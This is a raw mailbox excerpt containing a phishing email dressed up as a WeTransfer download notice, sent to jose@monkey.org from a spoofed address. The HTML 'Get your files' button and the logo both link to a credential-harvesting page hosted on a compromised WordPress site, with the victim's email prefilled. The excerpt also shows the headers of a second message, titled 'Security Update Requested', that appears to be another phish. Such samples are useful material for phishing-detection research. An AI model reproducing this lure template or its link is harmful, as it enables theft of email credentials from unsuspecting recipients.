From: "WeTransfer" <amphany@dld.go.th>
Date: Thu, 24 Jan 2019 01:39:23 -0800
Message-Id: <20190124093923.6ED4140158C@mta02.zi.mail.go.th>
X-PMX-Version: 6.4.3.2751440, Antispam-Engine: 2.7.2.2107409, Antispam-Data: 2019.1.24.93316, AntiVirus-Engine: 5.56.0, AntiVirus-Data: 2019.1.11.5560000
Status: O
X-Status: 
X-Keywords:                  
X-UID: 17

You will not see this in a MIME-aware mail reader.
--===============1868269198==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

  =

    =

     =

    =

  =

   =

 =

    =

    =

   jose@monkey.org =

You have received a file via WeTransfer
  2 files, 138 MB in total. Will be deleted on 24 Jan, 2019
   =

   Get your files
</! TD>
   =20

--===============1868269198==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV id=3Dyiv2956564175yui_3_16_0_ym19_1_15183=
94473215_35469 style=3D'FONT-SIZE: 16px; FONT-FAMILY: HelveticaNeue, "Helve=
tica Neue", Helvetica, Arial, "Lucida Grande", sans-serif; WHITE-SPACE: nor=
mal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(=
0,0,0); FONT-STYLE: normal; TEXT-ALIGN: center; ORPHANS: 2; WIDOWS: 2; LETT=
ER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; f=
ont-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-stro=
ke-width: 0px; text-decoration-style: initial; text-decoration-color: initi=
al'>
<DIV id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35468 style=3D"TEXT-=
ALIGN: center">
<TABLE id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35467 class=3D"yiv=
2956564175gmail-m_911891310866232251gmail-x_gmail-x_yiv6729642149x_table_fu=
ll_width yiv2956564175yahoo-compose-table-card" style=3D"FONT-SIZE: 13px; W=
IDTH: 600px; WHITE-SPACE: normal; WORD-SPACING: 0px; BORDER-COLLAPSE: colla=
pse; TABLE-LAYOUT: fixed; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rg=
b(38,40,42); OUTLINE-WIDTH: medium; PADDING-BOTTOM: 0px; FONT-STYLE: normal=
; TEXT-ALIGN: left; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-LEFT: 0p=
x; MARGIN: 0px auto; LETTER-SPACING: normal; PADDING-RIGHT: 0px; TEXT-INDEN=
T: 0px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35466>
<TR id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35465>
<TD id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35464 class=3Dyiv2956=
564175gmail-m_911891310866232251gmail-x_gmail-x_yiv6729642149x_logo_outer_w=
rapper_td style=3D"FONT-FAMILY: arial, sans-serif; WIDTH: 600px; OUTLINE-WI=
DTH: medium; PADDING-BOTTOM: 0px; PADDING-TOP: 55px; OUTLINE-STYLE: none; P=
ADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px" vAlign=3Dtop align=3Dlef=
t>
<TABLE id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35578 class=3D"yiv=
2956564175gmail-m_911891310866232251gmail-x_gmail-x_yiv6729642149x_table_fu=
ll_width yiv2956564175yahoo-compose-table-card" style=3D"WIDTH: 600px; BORD=
ER-COLLAPSE: collapse; TABLE-LAYOUT: fixed; OUTLINE-WIDTH: medium; PADDING-=
BOTTOM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-LEFT: 0px; MARG=
IN: 0px; PADDING-RIGHT: 0px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35577>
<TR id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35576>
<TD id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35575 class=3Dyiv2956=
564175gmail-m_911891310866232251gmail-x_gmail-x_yiv6729642149x_logo_inner_w=
rapper_td style=3D"FONT-SIZE: 10px; FONT-FAMILY: arial, sans-serif; WIDTH: =
600px; OUTLINE-WIDTH: medium; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; OUTLIN=
E-STYLE: none; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px" bgColor=
=3D#409fff vAlign=3Dtop align=3Dleft>
<CENTER id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35574>
<TABLE class=3D"yiv2956564175gmail-m_911891310866232251gmail-x_gmail-x_yiv6=
729642149x_table_centered yiv2956564175yahoo-compose-table-card" style=3D"W=
IDTH: auto; BORDER-COLLAPSE: collapse; TABLE-LAYOUT: fixed; OUTLINE-WIDTH: =
medium; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING=
-LEFT: 0px; MARGIN: 0px auto; PADDING-RIGHT: 0px" cellSpacing=3D0 cellPaddi=
ng=3D0 align=3Dcenter border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; WIDTH: 56px; OUTLINE-WIDTH: me=
dium; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-L=
EFT: 0px; MARGIN: 0px; MIN-HEIGHT: 16px; PADDING-RIGHT: 0px" height=3D16 vA=
lign=3Dtop align=3Dleft> </TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; WIDTH: 56px; OUTLINE-WIDTH: me=
dium; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-L=
EFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px" vAlign=3Dtop align=3Dleft><A sty=
le=3D"TEXT-DECORATION: underline; COLOR: rgb(25,106,212)" href=3D"https://c=
ricswag.in/wp-includes/js/sign-in/wt.php?email=3Djose@monkey.org" rel=3Dnof=
ollow target=3D_blank><IMG class=3Dyiv2956564175gmail-m_911891310866232251g=
mail-x_gmail-x_yiv6729642149x_logo_white_img style=3D"WIDTH: 56px; OUTLINE-=
WIDTH: medium; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; =
PADDING-LEFT: 0px; MARGIN: 0px; DISPLAY: block; LINE-HEIGHT: 10px; PADDING-=
RIGHT: 0px" border=3D0 alt=3D"Click 'Download images' to view images" src=
=3D"https://encrypted-tbn0.gstatic.com/images?q=3Dtbn:ANd9GcRlqia-bqB-aAynw=
2SvOlHGG5olxEcKEMZZ1YyIieZ7ww4We7cTFA" width=3D50 align=3Dmiddle height=3D3=
0></A></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; WIDTH: 56px; OUTLINE-WIDTH: me=
dium; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-L=
EFT: 0px; MARGIN: 0px; MIN-HEIGHT: 11px; PADDING-RIGHT: 0px" height=3D11 vA=
lign=3Dtop align=3Dleft> </TD></TR></TBODY></TABLE></CENTER></TD></TR></TBO=
DY></TABLE></TD></TR></TBODY></TABLE>
<TABLE id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35591 class=3D"yiv=
2956564175gmail-m_911891310866232251gmail-x_gmail-x_yiv6729642149x_main_con=
tent_outer_wrapper_table yiv2956564175yahoo-compose-table-card" style=3D"FO=
NT-SIZE: 13px; WIDTH: 600px; WHITE-SPACE: normal; WORD-SPACING: 0px; BORDER=
-COLLAPSE: collapse; TABLE-LAYOUT: fixed; TEXT-TRANSFORM: none; FONT-WEIGHT=
: 400; COLOR: rgb(38,40,42); OUTLINE-WIDTH: medium; PADDING-BOTTOM: 0px; FO=
NT-STYLE: normal; TEXT-ALIGN: left; PADDING-TOP: 0px; OUTLINE-STYLE: none; =
PADDING-LEFT: 0px; MARGIN: 0px auto; LETTER-SPACING: normal; PADDING-RIGHT:=
 0px; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px" cellSpacing=3D0=
 cellPadding=3D0 bgColor=3D#ffffff border=3D0>
<TBODY id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35590>
<TR id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35589>
<TD id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35588 style=3D"FONT-F=
AMILY: arial, sans-serif; WIDTH: 600px; OUTLINE-WIDTH: medium; PADDING-BOTT=
OM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-LEFT: 0px; MARGIN: =
0px; PADDING-RIGHT: 0px" vAlign=3Dtop align=3Dleft>
<TABLE id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35587 class=3D"yiv=
2956564175gmail-m_911891310866232251gmail-x_gmail-x_yiv6729642149x_table_fu=
ll_width yiv2956564175yahoo-compose-table-card" style=3D"WIDTH: 600px; BORD=
ER-COLLAPSE: collapse; TABLE-LAYOUT: fixed; OUTLINE-WIDTH: medium; PADDING-=
BOTTOM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-LEFT: 0px; MARG=
IN: 0px; PADDING-RIGHT: 0px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35586>
<TR id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35585>
<TD id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35584 class=3D"yiv295=
6564175gmail-m_911891310866232251gmail-x_gmail-x_yiv6729642149x_padded_mobi=
le yiv2956564175gmail-m_911891310866232251gmail-x_gmail-x_yiv6729642149x_ma=
in_content_inner_wrapper_td" style=3D"FONT-FAMILY: arial, sans-serif; WIDTH=
: 600px; OUTLINE-WIDTH: medium; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; OUTL=
INE-STYLE: none; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px" vAlign=
=3Dtop align=3Dleft>
<TABLE id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35583 class=3D"yiv=
2956564175gmail-m_911891310866232251gmail-x_gmail-x_yiv6729642149x_table_fu=
ll_width yiv2956564175yahoo-compose-table-card" style=3D"WIDTH: 600px; BORD=
ER-COLLAPSE: collapse; TABLE-LAYOUT: fixed; OUTLINE-WIDTH: medium; PADDING-=
BOTTOM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-LEFT: 0px; MARG=
IN: 0px; PADDING-RIGHT: 0px" cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35582>
<TR style=3D"FONT-SIZE: 15px; COLOR: rgb(33,33,33)">
<TD class=3D"yiv2956564175gmail-m_911891310866232251gmail-x_gmail-x_yiv6729=
642149x_main_heading_td yiv2956564175gmail-m_911891310866232251gmail-x_gmai=
l-x_yiv6729642149x_unpadded_mobile yiv2956564175gmail-m_911891310866232251g=
mail-x_gmail-x_yiv6729642149x_main_heading_td_wider" style=3D"FONT-SIZE: 26=
px; WIDTH: 440px; COLOR: rgb(23,24,26); OUTLINE-WIDTH: medium; PADDING-BOTT=
OM: 0px; PADDING-TOP: 60px; OUTLINE-STYLE: none; PADDING-LEFT: 80px; MARGIN=
: 0px; LINE-HEIGHT: 30px; PADDING-RIGHT: 80px" vAlign=3Dtop align=3Dcenter>=
<SPAN class=3Dyiv2956564175gmail-m_911891310866232251gmail-x_gmail-x_yiv672=
9642149x_main_heading_email_link>jose@monkey.org</SPAN> <BR>You have receiv=
ed a file via WeTransfer</TD></TR>
<TR id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35581 style=3D"FONT-S=
IZE: 15px; COLOR: rgb(33,33,33)">
<TD id=3Dyiv2956564175yui_3_16_0_ym19_1_1518394473215_35580 class=3D"yiv295=
6564175gmail-m_911891310866232251gmail-x_gmail-x_yiv6729642149x_files_detai=
ls_td yiv2956564175gmail-m_911891310866232251gmail-x_gmail-x_yiv6729642149x=
_unpadded_mobile" style=3D"FONT-SIZE: 14px; WIDTH: 440px; COLOR: rgb(145,14=
9,153); OUTLINE-WIDTH: medium; PADDING-BOTTOM: 0px; PADDING-TOP: 20px; OUTL=
INE-STYLE: none; PADDING-LEFT: 80px; MARGIN: 0px; LINE-HEIGHT: 23px; PADDIN=
G-RIGHT: 80px" vAlign=3Dtop align=3Dcenter>2 files, 138 MB in total. Will b=
e deleted on 24 Jan, 2019</TD></TR>
<TR id=3Dyiv2956564175yui_3_16_0_ym19_1_1518589672456_8527 style=3D"FONT-SI=
ZE: 15px; COLOR: rgb(33,33,33)">
<TD id=3Dyiv2956564175yui_3_16_0_ym19_1_1518589672456_8526 class=3D"yiv2956=
564175gmail-m_911891310866232251gmail-x_gmail-x_yiv6729642149x_button_outer=
_wrapper_td yiv2956564175gmail-m_911891310866232251gmail-x_gmail-x_yiv67296=
42149x_unpadded_mobile" style=3D"FONT-FAMILY: arial, sans-serif; WIDTH: 280=
px; OUTLINE-WIDTH: medium; PADDING-BOTTOM: 0px; PADDING-TOP: 40px; OUTLINE-=
STYLE: none; PADDING-LEFT: 160px; MARGIN: 0px; PADDING-RIGHT: 160px" vAlign=
=3Dtop align=3Dleft>
<TABLE id=3Dyiv2956564175yui_3_16_0_ym19_1_1518589672456_8525 class=3D"yiv2=
956564175gmail-m_911891310866232251gmail-x_gmail-x_yiv6729642149x_table_ful=
l_width yiv2956564175gmail-m_911891310866232251gmail-x_gmail-x_yiv672964214=
9x_button_table yiv2956564175yahoo-compose-table-card" style=3D"WIDTH: 280p=
x; BORDER-COLLAPSE: collapse; TABLE-LAYOUT: fixed; OUTLINE-WIDTH: medium; P=
ADDING-BOTTOM: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-LEFT: 0p=
x; MARGIN: 0px; PADDING-RIGHT: 0px" cellSpacing=3D0 cellPadding=3D0 border=
=3D0>
<TBODY id=3Dyiv2956564175yui_3_16_0_ym19_1_1518589672456_8524>
<TR id=3Dyiv2956564175yui_3_16_0_ym19_1_1518589672456_8523>
<TD id=3Dyiv2956564175yui_3_16_0_ym19_1_1518589672456_8522 style=3D"FONT-FA=
MILY: arial, sans-serif; WIDTH: 280px; OUTLINE-WIDTH: medium; PADDING-BOTTO=
M: 0px; PADDING-TOP: 0px; OUTLINE-STYLE: none; PADDING-LEFT: 0px; MARGIN: 0=
px; PADDING-RIGHT: 0px" vAlign=3Dtop align=3Dleft><A id=3Dyiv2956564175yui_=
3_16_0_ym19_1_1518589672456_8521 class=3D"yiv2956564175gmail-m_911891310866=
232251gmail-x_gmail-x_yiv6729642149x_button_anchor yiv2956564175gmail-m_911=
891310866232251gmail-x_gmail-x_yiv6729642149x_button_2_anchor" style=3D"FON=
T-SIZE: 14px; TEXT-DECORATION: underline; COLOR: rgb(255,255,255); PADDING-=
BOTTOM: 15px; TEXT-ALIGN: center; PADDING-TOP: 15px; PADDING-LEFT: 20px; DI=
SPLAY: block; PADDING-RIGHT: 20px; BACKGROUND-COLOR: rgb(64,159,255); borde=
r-radius: 25px" href=3D"https://cricswag.in/wp-includes/js/sign-in/wt.php?e=
mail=3Djose@monkey.org" rel=3Dnofollow target=3D_blank><SPAN id=3Dyiv295656=
4175yui_3_16_0_ym19_1_1518589672456_8520>Get your files</SPAN></A></TD></TR=
></TBODY></TABLE></!
 TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABL=
E>
<DIV style=3D"FONT-SIZE: 13px; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT=
-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(38,40,42); FONT-STYLE: norma=
l; LETTER-SPACING: normal; TEXT-INDENT: 0px"> </DIV>
<DIV style=3D"FONT-SIZE: 15px; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT=
-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(33,33,33); FONT-STYLE: norma=
l; LETTER-SPACING: normal; TEXT-INDENT: 0px"> </DIV></DIV></DIV><BR class=
=3DApple-interchange-newline></BODY></HTML>
--===============1868269198==--

From jose@monkey.org Thu Jan 24 22:29:19 2019 +0000
Return-Path: info.amx@unm.edu
Delivered-To: jose@monkey.org
X-FDA: 75089458038.14.pigs65_8b8b0708d2040
X-Spam-Summary: 1,0,0,,d41d8cd98f00b204,info.amx@unm.edu,:info.amx@unm.edu,RULES_HIT:30026:30054:30055:30070,0,RBL:68.99.120.53:@unm.edu:.lbl8.mailshell.net-62.22.0.32 64.201.201.201;68.99.120.53-irl.urbl.hostedemail.com-127.0.0.150,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fs,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:9,LUA_SUMMARY:none
X-HE-Tag: pigs65_8b8b0708d2040
X-Filterd-Recvd-Size: 1759
Received: from dukecmwbtp05.coxmail.com (dukecmwbtp05.coxmail.com [68.99.120.53])
	by imf06.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 24 Jan 2019 22:29:18 +0000 (UTC)
Received: from dukecmimpo03.coxmail.com ([68.99.120.137])
          by dukecmfep04.coxmail.com
          (InterMail vM.8.01.05.08 201-2260-151-120-20120517) with ESMTP
          id <20190124213005.ELKT2019.dukecmfep04.coxmail.com@dukecmimpo03.coxmail.com>;
          Thu, 24 Jan 2019 16:30:05 -0500
Received: from [104.168.98.131] ([172.18.18.217])
	by dukecmimpo03.coxmail.com with bizsmtp
	id UM9h1z00E4h0NJL01MNuoi; Thu, 24 Jan 2019 16:23:04 -0500
Content-Type: multipart/alternative; boundary="===============0919632412=="
MIME-Version: 1.0
Subject: Security Update Requested
To: Recipients <info.Amx@unm.edu>
